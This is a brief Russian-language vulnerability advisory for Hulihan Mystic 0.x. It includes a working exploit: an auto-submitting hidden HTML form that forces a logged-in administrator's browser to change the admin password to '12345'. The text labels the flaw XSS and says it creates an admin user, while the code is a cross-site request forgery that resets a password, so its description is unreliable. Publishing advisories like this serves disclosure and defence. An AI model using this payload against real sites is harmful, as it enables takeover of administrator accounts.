Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
Программа: Hulihan Mystic 0.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных при обработке HTTP запросов. Атакующий может обманным образом заманить
пользователя на специально составленный сайт, что позволит создать пользователя
с правами администратора.
Эксплоит:
<form action="http://host/admin/change_password" method="post" name="main"
>
<input type="hidden" name="user[password]" value="12345" />
<input type="hidden" name="user[password_confirmation]" value="12345" />
<input type="hidden" name="commit" value="Change Password" />
</form>
<script>
document.main.submit();
</script>
